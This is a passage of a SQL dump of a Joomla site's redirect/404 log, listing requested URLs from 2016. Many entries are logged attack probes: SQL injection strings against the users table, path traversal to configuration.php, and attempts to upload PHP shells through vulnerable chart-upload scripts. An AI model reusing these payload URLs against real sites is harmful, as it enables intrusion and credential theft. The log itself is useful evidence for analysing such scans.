00:00:00',301),(8160,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/trackback/','','http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/','',1,0,'2016-06-17 22:38:56','0000-00-00 00:00:00',301),(8161,'http://3s-technologies.com.tr/index.php/en/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library','','http://3s-technologies.com.tr/index.php/en/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library','',1,0,'2016-06-28 08:19:40','0000-00-00 00:00:00',301),(8162,'http://3s-technologies.com.tr/index.php/en/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','http://3s-technologies.com.tr/index.php/en/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','',1,0,'2016-06-30 04:17:14','0000-00-00 00:00:00',301),(8163,'http://3s-technologies.com.tr/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(select+1+FROM(select+count(*),concat((select+substring(username,1,100)+FROM+jos_users+WHERE+id=(SELECT+user_id+FROM+jos_user_u','','','',1,0,'2016-07-02 20:05:25','0000-00-00 00:00:00',301),(8164,'http://www.3s-technologies.com.tr/index.php?option=com_garyscookbook&func=newItem','','','',1,0,'2016-07-03 14:40:19','0000-00-00 00:00:00',301),(8165,'http://3s-technologies.com.tr/index.php/en/administrator/components/com_maianmedia/maianmedia.xml','','http://3s-technologies.com.tr/index.php/en/administrator/components/com_maianmedia/maianmedia.xml','',2,0,'2016-07-06 11:29:26','0000-00-00 00:00:00',301),(8166,'http://3s-technologies.com.tr/index.php/en/administrator/components/com_simpleswfupload/simpleswfupload.xml','','http://3s-technologies.com.tr/index.php/en/administrator/components/com_simpleswfupload/simpleswfupload.xml','',2,0,'2016-07-06 12:58:09','0000-00-00 00:00:00',301),(8167,'http://3s-technologies.com.tr/index.php/en/components/com_joomsport/includes/imgres.php','','http://3s-technologies.com.tr/index.php/en/components/com_joomsport/includes/imgres.php','',1,0,'2016-07-06 13:01:47','0000-00-00 00:00:00',301),(8168,'http://3s-technologies.com.tr/index.php/en/administrator/components/com_simpleswfupload/com_simpleswfupload.xml','','http://3s-technologies.com.tr/index.php/en/administrator/components/com_simpleswfupload/com_simpleswfupload.xml','',1,0,'2016-07-07 02:07:39','0000-00-00 00:00:00',301),(8169,'http://3s-technologies.com.tr/index.php/en/about-us','','','',1,0,'2016-07-07 15:03:43','0000-00-00 00:00:00',301),(8170,'http://3s-technologies.com.tr/index.php/en/modules/mod_jfancy/mod_jfancy.xml','','http://3s-technologies.com.tr/index.php/en/modules/mod_jfancy/mod_jfancy.xml','',1,0,'2016-07-08 05:01:36','0000-00-00 00:00:00',301),(8171,'http://www.3s-technologies.com.tr/index.php/login-form','','','',5,0,'2016-07-08 20:02:39','0000-00-00 00:00:00',301),(8172,'http://www.3s-technologies.com.tr/index.php/login','','','',15,0,'2016-07-08 20:02:40','0000-00-00 00:00:00',301),(8173,'http://www.3s-technologies.com.tr/index.php/register','','','',5,0,'2016-07-08 20:02:40','0000-00-00 00:00:00',301),(8174,'http://www.3s-technologies.com.tr/index.php/log-out','','','',5,0,'2016-07-08 20:02:41','0000-00-00 00:00:00',301),(8175,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/tr/using-joomla/extensions/components/users-component/registration-form?layout=complete','','http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/users-component/registration-form?task=registration.activate&token=f','',1,0,'2016-07-08 20:06:39','0000-00-00 00:00:00',301),(8176,'http://3s-technologies.com.tr/index.php/en/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php','','http://3s-technologies.com.tr/index.php/en/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php','',1,0,'2016-07-09 05:15:37','0000-00-00 00:00:00',301),(8177,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component//components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1','','','',1,0,'2016-07-09 10:10:29','0000-00-00 00:00:00',301),(8178,'http://3s-technologies.com.tr/index.php/en/assets/js/uploadify/uploadify.php','','http://3s-technologies.com.tr/index.php/en/assets/js/uploadify/uploadify.php','',2,0,'2016-07-11 07:43:54','0000-00-00 00:00:00',301),(8179,'http://www.3s-technologies.com.tr/index.php?option=com_user&view=registration','','http://www.3s-technologies.com.tr/index.php?option=com_user&view=registration','',1,0,'2016-07-12 01:03:56','0000-00-00 00:00:00',301),(8180,'http://3s-technologies.com.tr/index.php/en/modules/mod_artuploader/upload.php','','http://3s-technologies.com.tr/index.php/en/modules/mod_artuploader/upload.php','',1,0,'2016-07-12 06:24:40','0000-00-00 00:00:00',301),(8181,'http://3s-technologies.com.tr/index.php/en/uploadify/uploadify.php','','http://3s-technologies.com.tr/index.php/en/uploadify/uploadify.php','',1,0,'2016-07-12 11:24:44','0000-00-00 00:00:00',301),(8182,'http://3s-technologies.com.tr/index.php/en/modules/pm_advancedsearch4/config.xml','','http://3s-technologies.com.tr/index.php/en/modules/pm_advancedsearch4/config.xml','',1,0,'2016-07-21 11:09:03','0000-00-00 00:00:00',301),(8183,'http://3s-technologies.com.tr/index.php/en/administrator/components/com_facileforms/facileforms.xml','','http://3s-technologies.com.tr/index.php/en/administrator/components/com_facileforms/facileforms.xml','',1,0,'2016-07-22 10:59:54','0000-00-00 00:00:00',301),(8184,'http://www.3s-technologies.com.tr/index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=2','','','',1,0,'2016-07-24 15:16:05','0000-00-00 00:00:00',301),(8185,'http://3s-technologies.com.tr/index.php/en/administrator/components/com_bt_portfolio/index.html','','http://3s-technologies.com.tr/index.php/en/administrator/components/com_bt_portfolio/index.html','',1,0,'2016-07-26 07:59:35','0000-00-00 00:00:00',301),(8186,'http://3s-technologies.com.tr/index.php/en/administrator/components/com_bt_portfolio/bt_portfolio.xml','','http://3s-technologies.com.tr/index.php/en/administrator/components/com_bt_portfolio/bt_portfolio.xml','',1,0,'2016-07-26 11:18:46','0000-00-00 00:00:00',301),(8187,'http://3s-technologies.com.tr/index.php/en/index.php?option=com_aicontactsafe','','http://3s-technologies.com.tr/index.php/en/index.php?option=com_aicontactsafe','',2,0,'2016-07-26 12:54:43','0000-00-00 00:00:00',301),(8188,'http://3s-technologies.com.tr/index.php/en/assets/modules/evogallery/js/uploadify/uploadify.css','','http://3s-technologies.com.tr/index.php/en/assets/modules/evogallery/js/uploadify/uploadify.css','',1,0,'2016-07-27 09:03:20','0000-00-00 00:00:00',301),(8189,'http://www.3s-technologies.com.tr/index.php?option=com_simplephotogallery&view=images&photoid=&Itemid=&albumid=-0 UNION ALL SELECT NULL,NULL,CONCAT(0x776F6F79756E),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--','','','',1,0,'2016-08-04 17:13:17','0000-00-00 00:00:00',301),(8190,'http://www.3s-technologies.com.tr/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(select 1 from (select count(*),concat((select (select concat(0x776F6F79756E)) from #__users limit 0,1),floor(rand(0)*2))x ','','','',1,0,'2016-08-04 17:13:17','0000-00-00 00:00:00',301),(8191,'http://www.3s-technologies.com.tr/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(select 1 from (select count(*),concat((select 0x6275677363616E776B),floor(rand(0)*2))x from information_schema.tables grou','','','',1,0,'2016-08-04 17:46:05','0000-00-00 00:00:00',301),(8192,'http://3s-technologies.com.tr/index.php/en/administrator/components/com_simplephotogallery/simplephotogallery.xml','','http://3s-technologies.com.tr/index.php/en/administrator/components/com_simplephotogallery/simplephotogallery.xml','',2,0,'2016-08-08 02:29:29','0000-00-00 00:00:00',301),(8193,'http://3s-technologies.com.tr/index.php/en/modules/mod_dionefileuploader/mod_dionefileuploader.xml','','http://3s-technologies.com.tr/index.php/en/modules/mod_dionefileuploader/mod_dionefileuploader.xml','',1,0,'2016-08-08 13:57:24','0000-00-00 00:00:00',301),(8194,'http://3s-technologies.com.tr/index.php/en/administrator/components/com_simplephotogallery/lib/uploadFile.php','','http://3s-technologies.com.tr/index.php/en/administrator/components/com_simplephotogallery/lib/uploadFile.php','',1,0,'2016-08-09 10:34:34','0000-00-00 00:00:00',301),(8195,'http://3s-technologies.com.tr/index.php?option=com_flippingbook','','','',4,0,'2016-08-11 03:29:54','0000-00-00 00:00:00',301),(8196,'http://3s-technologies.com.tr/index.php/en/administrator/components/com_simpleimageupload/manifest.xml','','http://3s-technologies.com.tr/index.php/en/administrator/components/com_simpleimageupload/manifest.xml','',1,0,'2016-08-11 11:28:25','0000-00-00 00:00:00',301),(8197,'http://3s-technologies.com.tr/index.php/en/index.php?option=com_simpleimageupload&view=upload&tmpl=component','','http://3s-technologies.com.tr/index.php/en/index.php?option=com_simpleimageupload&view=upload&tmpl=component','',1,0,'2016-08-12 03:18:55','0000-00-00 00:00:00',301),(8198,'http://3s-technologies.com.tr/index.php/en/administrator/components/com_myblog/myblog.xml','','http://3s-technologies.com.tr/index.php/en/administrator/components/com_myblog/myblog.xml','',1,0,'2016-08-12 10:51:28','0000-00-00 00:00:00',301),(8199,'http://3s-technologies.com.tr/index.php/en/modules/mod_creativecontactform/mod_creativecontactform.xml','','http://3s-technologies.com.tr/index.php/en/modules/mod_creativecontactform/mod_creativecontactform.xml','',1,0,'2016-08-13 04:07:42','0000-00-00 00:00:00',301),(8200,'http://3s-technologies.com.tr/index.php/en/components/com_creativecontactform/fileupload/index.php','','http://3s-technologies.com.tr/index.php/en/components/com_creativecontactform/fileupload/index.php','',3,0,'2016-08-13 10:47:09','0000-00-00 00:00:00',301),(8201,'http://3s-technologies.com.tr/index.php/en/administrator/components/com_agileplmform/agileplmform.xml','','http://3s-technologies.com.tr/index.php/en/administrator/components/com_agileplmform/agileplmform.xml','',1,0,'2016-08-14 03:24:57','0000-00-00 00:00:00',301),(8202,'http://3s-technologies.com.tr/index.php?option=com_userlist','','','',1,0,'2016-08-14 17:37:31','0000-00-00 00:00:00',301),(8203,'http://3s-technologies.com.tr/index.php?option=com_dtregister','','','',2,0,'2016-08-14 17:37:32','0000-00-00 00:00:00',301),(8204,'http://3s-technologies.com.tr/index.php/en/components/com_simpleswfupload/uploadhandler.php','','http://3s-technologies.com.tr/index.php/en/components/com_simpleswfupload/uploadhandler.php','',1,0,'2016-08-20 06:01:35','0000-00-00 00:00:00',301),(8205,'http://3s-technologies.com.tr/index.php/en/administrator/components/com_simpleswfupload/uploadhandler.php','','http://3s-technologies.com.tr/index.php/en/administrator/components/com_simpleswfupload/uploadhandler.php','',1,0,'2016-08-22 03:08:09','0000-00-00 00:00:00',301),(8206,'http://3s-technologies.com.tr/index.php/en/modules/simpleslideshow/uploadimage.php','','http://3s-technologies.com.tr/index.php/en/modules/simpleslideshow/uploadimage.php','',1,0,'2016-08-25 02:36:12','0000-00-00 00:00:00',301),(8207,'http://3s-technologies.com.tr/index.php/en/modules/homepageadvertise/uploadimage.php','','http://3s-technologies.com.tr/index.php/en/modules/homepageadvertise/uploadimage.php','',1,0,'2016-08-25 02:36:13','0000-00-00 00:00:00',301),(8208,'http://3s-technologies.com.tr/index.php/en/modules/homepageadvertise2/uploadimage.php','','http://3s-technologies.com.tr/index.php/en/modules/homepageadvertise2/uploadimage.php','',1,0,'2016-08-25 02:39:05','0000-00-00 00:00:00',301),(8209,'http://3s-technologies.com.tr/index.php/en/modules/columnadverts/uploadimage.php','','http://3s-technologies.com.tr/index.php/en/modules/columnadverts/uploadimage.php','',2,0,'2016-08-25 02:44:05','0000-00-00 00:00:00',301),(8210,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/ueruenler.smd-ultra-hız/by,ordering?language=tr-TR','','','',8,0,'2016-08-25 05:30:21','0000-00-00 00:00:00',301),(8211,'http://3s-technologies.com.tr/index.php/en/wp-content/themes/Directory/style.css','','http://3s-technologies.com.tr/index.php/en/wp-content/themes/Directory/style.css','',1,0,'2016-08-25 09:04:29','0000-00-00 00:00:00',301),(8212,'http://3s-technologies.com.tr/index.php/en/modules/productpageadverts/uploadimage.php','','http://3s-technologies.com.tr/index.php/en/modules/productpageadverts/uploadimage.php','',1,0,'2016-08-25 09:10:32','0000-00-00 00:00:00',301),(8213,'https://www.dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php/tr/parks-home','','','',1,0,'2016-08-25 21:56:31','0000-00-00 00:00:00',301),(8214,'http://3s-technologies.com.tr/index.php/en/index.php/component/jdownloads/upload?Itemid=0','','http://3s-technologies.com.tr/index.php/en/index.php/component/jdownloads/upload?Itemid=0','',1,0,'2016-08-27 04:23:56','0000-00-00 00:00:00',301),(8215,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/article-categories/api/xmlrpc','','','',1,0,'2016-08-27 10:14:09','0000-00-00 00:00:00',301),(8216,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/article-categories/app/etc/local.xml','','','',1,0,'2016-08-27 10:14:08','0000-00-00 00:00:00',301),(8217,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/article-categories//skin/404.php','','','',1,0,'2016-08-27 10:14:10','0000-00-00 00:00:00',301),(8218,'http://3s-technologies.com.tr/index.php/en/wp-content/plugins/1-flash-gallery/readme.txt','','http://3s-technologies.com.tr/index.php/en/wp-content/plugins/1-flash-gallery/readme.txt','',1,0,'2016-08-28 09:00:28','0000-00-00 00:00:00',301),(8219,'http://3s-technologies.com.tr/index.php/en/wp-index2.php','','http://3s-technologies.com.tr/index.php/en/wp-index2.php','',1,0,'2016-08-30 04:26:53','0000-00-00 00:00:00',301),(8220,'http://3s-technologies.com.tr/index.php/en/license.php','','http://3s-technologies.com.tr/index.php/en/license.php','',1,0,'2016-08-30 13:05:23','0000-00-00 00:00:00',301),(8221,'http://3s-technologies.com.tr/index.php/en/cde42170f4f5b29105ed3977c1f5f4d1.php','','http://3s-technologies.com.tr/index.php/en/cde42170f4f5b29105ed3977c1f5f4d1.php','',1,0,'2016-08-31 03:13:53','0000-00-00 00:00:00',301),(8222,'http://www.3s-technologies.com.tr/index.php/tr/index.php?option=com_user&view=login','','http://www.3s-technologies.com.tr/index.php/tr/index.php?option=com_user&view=login','',2,0,'2016-08-31 07:53:36','0000-00-00 00:00:00',301),(8223,'http://www.3s-technologies.com.tr/index.php/index.php?option=com_user&view=login','','http://www.3s-technologies.com.tr/index.php/index.php?option=com_user&view=login','',1,0,'2016-08-31 07:53:36','0000-00-00 00:00:00',301),(8224,'http://3s-technologies.com.tr/index.php/en/images/db_config.php.xxxjpg','','http://3s-technologies.com.tr/index.php/en/images/db_config.php.xxxjpg','',2,0,'2016-08-31 12:27:50','0000-00-00 00:00:00',301),(8225,'http://www.3s-technologies.com.tr/index.php?option=com_agora','','http://www.3s-technologies.com.tr/index.php?option=com_agora','',1,0,'2016-08-31 16:25:27','0000-00-00 00:00:00',301),(8226,'http://www.3s-technologies.com.tr/index.php?option=com_ccboard&view=forumlist','','http://www.3s-technologies.com.tr/index.php?option=com_ccboard&view=forumlist','',1,0,'2016-08-31 16:56:56','0000-00-00 00:00:00',301),(8227,'http://www.3s-technologies.com.tr/index.php?option=com_easyblog&view=latest','','http://www.3s-technologies.com.tr/index.php?option=com_easyblog&view=latest','',1,0,'2016-08-31 17:28:44','0000-00-00 00:00:00',301),(8228,'http://www.3s-technologies.com.tr/index.php?option=com_community&view=frontpage','','http://www.3s-technologies.com.tr/index.php?option=com_community&view=frontpage','',1,0,'2016-08-31 18:00:31','0000-00-00 00:00:00',301),(8229,'http://www.3s-technologies.com.tr/index.php?option=com_k2&view=itemlist&task=date','','http://www.3s-technologies.com.tr/index.php?option=com_k2&view=itemlist&task=date','',1,0,'2016-08-31 18:51:17','0000-00-00 00:00:00',301),(8230,'http://www.3s-technologies.com.tr/index.php?option=com_kunena&view=category&layout=list','','http://www.3s-technologies.com.tr/index.php?option=com_kunena&view=category&layout=list','',1,0,'2016-08-31 19:23:16','0000-00-00 00:00:00',301),(8231,'http://www.3s-technologies.com.tr/index.php?option=com_phocaguestbook&view=phocaguestbook&id=1','','http://www.3s-technologies.com.tr/index.php?option=com_phocaguestbook&view=phocaguestbook&id=1','',1,0,'2016-08-31 19:55:31','0000-00-00 00:00:00',301),(8232,'http://www.3s-technologies.com.tr/index.php?option=com_vitabook&view=vitabook','','http://www.3s-technologies.com.tr/index.php?option=com_vitabook&view=vitabook','',1,0,'2016-08-31 20:27:53','0000-00-00 00:00:00',301),(8233,'http://www.3s-technologies.com.tr/index.php?option=com_myblog','','http://www.3s-technologies.com.tr/index.php?option=com_myblog','',1,0,'2016-08-31 21:00:08','0000-00-00 00:00:00',301),(8234,'http://www.3s-technologies.com.tr/index.php?option=com_blog&view=blog','','http://www.3s-technologies.com.tr/index.php?option=com_blog&view=blog','',1,0,'2016-08-31 22:04:29','0000-00-00 00:00:00',301),(8235,'http://www.3s-technologies.com.tr/index.php?option=com_myjspace&view=myjspace','','http://www.3s-technologies.com.tr/index.php?option=com_myjspace&view=myjspace','',1,0,'2016-08-31 22:36:44','0000-00-00 00:00:00',301),(8236,'http://www.3s-technologies.com.tr/index.php?option=com_joomblog&view=default','','http://www.3s-technologies.com.tr/index.php?option=com_joomblog&view=default','',1,0,'2016-08-31 23:09:02','0000-00-00 00:00:00',301),(8237,'http://3s-technologies.com.tr/index.php/en/images/0/db_config.php.xxxjpg','','http://3s-technologies.com.tr/index.php/en/images/0/db_config.php.xxxjpg','',2,0,'2016-09-01 03:50:34','0000-00-00 00:00:00',301),(8238,'http://www.3s-technologies.com.tr/index.php?option=com_content\'A=0&view=article&id=8:ews-310&catid=1:son-haberler&Itemid=28&lang=tr','','http://www.3s-technologies.com.tr/index.php?option=com_content\'A=0&view=article&id=8:ews-310&catid=1:son-haberler&Itemid=28&lang=tr','',1,0,'2016-09-01 06:46:35','0000-00-00 00:00:00',301),(8239,'http://3s-technologies.com.tr/index.php/en/components/com_facileforms/libraries/jquery/tooltip.js','','http://3s-technologies.com.tr/index.php/en/components/com_facileforms/libraries/jquery/tooltip.js','',1,0,'2016-09-05 03:33:44','0000-00-00 00:00:00',301),(8240,'http://3s-technologies.com.tr/index.php/en/administrator/components/com_facileforms/libraries/jquery/tooltip.js','','http://3s-technologies.com.tr/index.php/en/administrator/components/com_facileforms/libraries/jquery/tooltip.js','',1,0,'2016-09-06 03:41:56','0000-00-00 00:00:00',301),(8241,'https://www.dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php/welcome.html','','','',1,0,'2016-09-07 07:04:25','0000-00-00 00:00:00',301),(8242,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php/en/using-joomla/extensions/templates/beez-2/home-page-beez-2/81-english-uk/','','','',2,0,'2016-09-07 17:58:27','0000-00-00 00:00:00',301),(8243,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/administrator/','','','',1,0,'2016-09-20 03:41:05','0000-00-00 00:00:00',301),(8244,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/administrator','','','',1,0,'2016-09-20 03:41:08','0000-00-00 00:00:00',301),(8245,'http://3s-technologies.com.tr/index.php/en/footer.php','','http://3s-technologies.com.tr/index.php/en/footer.php','',1,0,'2016-09-22 06:19:24','0000-00-00 00:00:00',301),(8246,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2016-09-22 15:05:48','0000-00-00 00:00:00',301),(8247,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2016-09-22 15:05:49','0000-00-00 00:00:00',301),(8248,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2016-09-22 15:05:50','0000-00-00 00:00:00',301),(8249,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2016-09-22 15:05:50','0000-00-00 00:00:00',301),(8250,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2016-09-22 15:05:51','0000-00-00 00:00:00',301),(8251,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2016-09-22 15:05:52','0000-00-00 00:00:00',301),(8252,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2016-09-22 15:05:53','0000-00-00 00:00:00',301),(8253,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2016-09-22 15:05:54','0000-00-00 00:00:00',301),(8254,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2016-09-22 15:05:54','0000-00-00 00:00:00',301),(8255,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2016-09-22 15:05:55','0000-00-00 00:00:00',301),(8256,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2016-09-22 15:05:56','0000-00-00 00:00:00',301),(8257,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2016-09-22 15:05:57','0000-00-00 00:00:00',301),(8258,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2016-09-22 15:05:58','0000-00-00 00:00:00',301),(8259,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2016-09-22 15:05:59','0000-00-00 00:00:00',301),(8260,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2016-09-22 15:06:00','0000-00-00 00:00:00',301),(8261,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2016-09-22 15:06:00','0000-00-00 00:00:00',301),(8262,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2016-09-22 15:06:02','0000-00-00 00:00:00',301),(8263,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2016-09-22 15:06:03','0000-00-00 00:00:00',301),(8264,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2016-09-22 15:06:05','0000-00-00 00:00:00',301),(8265,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2016-09-22 15:06:06','0000-00-00 00:00:00',301),(8266,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2016-09-22 15:06:07','0000-00-00 00:00:00',301),(8267,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2016-09-22 15:06:08','0000-00-00 00:00:00',301),(8268,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2016-09-22 15:06:09','0000-00-00 00:00:00',301),(8269,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2016-09-22 15:06:10','0000-00-00 00:00:00',301),(8270,'http://www.3s-technologies.com.tr/index.php?option=com_fireboard&task=listcat','','http://www.3s-technologies.com.tr/index.php?option=com_fireboard&task=listcat','',1,0,'2016-09-24 01:51:03','0000-00-00 00:00:00',301),(8271,'http://www.3s-technologies.com.tr/index.php?option=com_joobb&view=board','','http://www.3s-technologies.com.tr/index.php?option=com_joobb&view=board','',1,0,'2016-09-24 15:13:15','0000-00-00 00:00:00',301),(8272,'http://www.3s-technologies.com.tr/index.php?option=com_datsogallery','','http://www.3s-technologies.com.tr/index.php?option=com_datsogallery','',1,0,'2016-09-25 02:58:49','0000-00-00 00:00:00',301),(8273,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php/en/administrator/','','','',1,0,'2016-09-25 09:45:33','0000-00-00 00:00:00',301),(8274,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php/en/administrator','','','',1,0,'2016-09-25 09:45:38','0000-00-00 00:00:00',301),(8275,'http://www.3s-technologies.com.tr/index.php?option=com_djclassifieds&view=show','','http://www.3s-technologies.com.tr/index.php?option=com_djclassifieds&view=show','',1,0,'2016-09-26 01:45:16','0000-00-00 00:00:00',301),(8276,'http://www.3s-technologies.com.tr/index.php?option=com_joomgallery','','http://www.3s-technologies.com.tr/index.php?option=com_joomgallery','',1,0,'2016-09-27 00:13:45','0000-00-00 00:00:00',301),(8277,'http://3s-technologies.com.tr/index.php/en/index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en','','http://3s-technologies.com.tr/index.php/en/index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en','',1,0,'2016-09-27 03:10:44','0000-00-00 00:00:00',301),(8278,'http://3s-technologies.com.tr/index.php/en/?option=com_eventbooking','','','',1,0,'2016-09-27 12:48:03','0000-00-00 00:00:00',301),(8279,'http://3s-technologies.com.tr/index.php/en/?option=com_publisher&view=issues&Itemid=1\'','','','',1,0,'2016-09-27 15:17:56','0000-00-00 00:00:00',301),(8280,'http://3s-technologies.com.tr/index.php/en/?option=com_publisher&view=issues&Itemid=1','','','',1,0,'2016-09-27 15:20:06','0000-00-00 00:00:00',301),(8281,'http://www.3s-technologies.com.tr/index.php/en/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php','','','',1,0,'2016-10-04 16:01:45','0000-00-00 00:00:00',301),(8282,'http://www.3s-technologies.com.tr/index.php/en/images/stories/mil.gif','','','',1,0,'2016-10-04 16:01:49','0000-00-00 00:00:00',301),(8283,'http://www.3s-technologies.com.tr/index.php/en/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=mil.php','','','',1,0,'2016-10-04 16:01:50','0000-00-00 00:00:00',301),(8284,'http://www.3s-technologies.com.tr/index.php/en/images/stories/pbot.php','','','',1,0,'2016-10-04 16:01:51','0000-00-00 00:00:00',301),(8285,'http://www.3s-technologies.com.tr/index.php/en/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=mil.php','','','',1,0,'2016-10-04 16:01:52','0000-00-00 00:00:00',301),(8286,'http://www.3s-technologies.com.tr/index.php/en/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php','','','',1,0,'2016-10-04 16:01:53','0000-00-00 00:00:00',301),(8287,'http://www.3s-technologies.com.tr/index.php/en/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php','','','',1,0,'2016-10-04 16:01:56','0000-00-00 00:00:00',301),(8288,'http://www.3s-technologies.com.tr/index.php/en/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php','','','',1,0,'2016-10-04 16:01:58','0000-00-00 00:00:00',301),(8289,'http://www.3s-technologies.com.tr/index.php/en/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php','','','',1,0,'2016-10-04 16:02:00','0000-00-00 00:00:00',301),(8290,'http://www.3s-technologies.com.tr/index.php/en/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php','','','',1,0,'2016-10-04 16:02:02','0000-00-00 00:00:00',301),(8291,'http://www.3s-technologies.com.tr/index.php/en/administrator/components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php','','','',1,0,'2016-10-04 16:02:06','0000-00-00 